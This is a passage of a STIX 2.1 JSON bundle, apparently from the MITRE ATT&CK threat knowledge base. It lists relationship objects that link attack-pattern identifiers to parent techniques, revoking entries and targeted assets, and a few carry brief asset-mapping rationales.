"attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc", "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--de2d023c-d1cf-4819-9d9c-67a772b0e313", "created": "2020-01-13T15:58:18.813Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--de56c26f-ea38-4e6e-a933-fdf4cd1932dd", "created": "2020-03-24T14:09:11.791Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--428ca9f8-0e33-442a-be87-f869cb4cf73e", "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--de73c6a8-fd33-469d-b7e4-e4f6edd823b9", "created": "2020-10-12T17:50:31.765Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dead5325-7efe-4dcc-bf78-42b9190f74da", "created": "2023-09-29T16:46:40.272Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:46:40.272Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--deb83319-bc5a-4b9b-a44a-bd369b899601", "created": "2024-03-25T20:18:12.056Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-25T20:18:12.056Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--def57041-6bb4-453a-bf04-188b9e97a35d", "created": "2023-09-28T21:26:34.603Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:26:34.603Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--def869f4-7564-4a09-8f49-59cb696b660d", "created": "2020-03-13T11:42:14.588Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df321d74-25d6-42da-80e8-3c9a291cb471", "created": "2023-09-28T19:57:41.602Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:57:41.602Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df7b521e-4496-432f-a61d-3094d0c7bc23", "created": "2023-09-29T17:58:26.994Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:58:26.994Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df80e2b6-5672-4f26-a19c-a394f3731f24", "created": "2023-09-28T19:48:48.649Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:48:48.649Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--df9f5a5b-0662-4904-8e57-bc25c244a6da", "created": "2023-09-28T20:11:11.658Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:11:11.658Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dfb20521-91c2-4f55-b92a-dab959759b78", "created": "2023-09-29T18:03:38.874Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:03:38.874Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dfc19325-9b8a-4cb7-80fc-dedc2cf8742a", "created": "2020-06-24T16:55:46.408Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dfeb0053-3513-4622-a5c0-a3554c8970a7", "created": "2021-03-29T17:06:22.388Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e07acc2b-6a92-423e-85be-a9caed4a8ee6", "created": "2020-10-20T00:05:48.864Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e1269074-37f4-460b-8a2a-cd26892d4f8e", "created": "2023-09-28T19:42:54.009Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:42:54.009Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e128847e-b3ae-420a-b46f-cb9db88f2cf4", "created": "2020-03-13T21:14:58.418Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", "target_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e12a3e0d-4ed1-467b-a2f1-ead1e58b8cae", "created": "2020-06-26T04:01:09.897Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771", "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e134a00e-8d72-4c3d-a5b1-3f9c6e1bd330", "created": "2020-10-01T00:50:30.025Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e17c3b74-69d8-47b2-88d4-adcaf418ab74", "created": "2023-09-29T17:08:48.251Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:08:48.251Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e1f28ed0-ec35-4792-ae02-a2d003bd3df4", "created": "2023-09-28T20:09:07.381Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:09:07.381Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e2980209-0a3b-4d12-8a85-1984b8e1844b", "created": "2020-02-20T21:09:56.412Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e2a6a14d-87d3-4a8b-966f-fb3c1fab6e87", "created": "2020-02-11T19:06:19.039Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--b8c5c9dd-a662-479d-9428-ae745872537c", "target_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e367aefb-5784-4fd8-85ac-56afa3f9e504", "created": "2020-03-30T19:16:29.761Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--6856ddd6-2df3-4379-8b87-284603c189c3", "target_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e398ecb9-1e98-4518-aff8-aa18f527f9dc", "created": "2020-06-28T22:55:55.826Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e3b04152-0c90-41ff-a333-c5163fa9714f", "created": "2023-09-29T17:41:22.619Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:41:22.619Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e3fe170d-55c7-4f98-9d39-6ee28403ce87", "created": "2020-10-02T16:55:16.136Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", "target_ref": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e41a04fe-a142-4294-a9f2-576214e1f985", "created": "2024-04-09T20:48:04.616Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:48:04.616Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e434db5d-f201-4411-825f-4a50e1e78c75", "created": "2023-09-29T17:06:20.834Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:06:20.834Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e49e0138-4247-4f3e-a42c-f0dab2f6ffbc", "created": "2023-09-29T18:49:44.351Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:49:44.351Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e4a43af9-e8f0-42cf-a707-b2393efb44f5", "created": "2020-03-20T19:03:04.500Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00", "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e4bc29f2-87c8-491d-b51b-d6cede7c1972", "created": "2023-09-29T16:45:33.777Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:45:33.777Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e4c62e59-d14e-4cbc-a4a9-4f64bd523d5a", "created": "2024-04-09T21:00:11.159Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-05-28T03:34:18.846Z", "description": "Asset Mapping Rationale: Adversaries may modify software and device credentials to prevent operator and responder access. ", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e525352e-0d7e-41e4-bb35-9c50f9ef39c6", "created": "2020-01-24T14:32:40.533Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e5c9aacb-51e3-41d3-995d-9e6ed04a2454", "created": "2023-10-02T20:17:51.320Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:17:51.320Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e67182ae-4edb-4f92-a906-c4c3edd2264d", "created": "2024-05-23T04:08:13.721Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:35:03.803Z", "description": "Asset Mapping Rationale: Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure.", "relationship_type": "targets", "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6867d44-3d34-4604-b5e8-35e325051f1e", "created": "2020-02-21T21:07:55.499Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e", "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e6af4cbd-1b2e-4733-be57-43a845f465eb", "created": "2023-09-28T20:30:32.778Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:30:32.778Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": 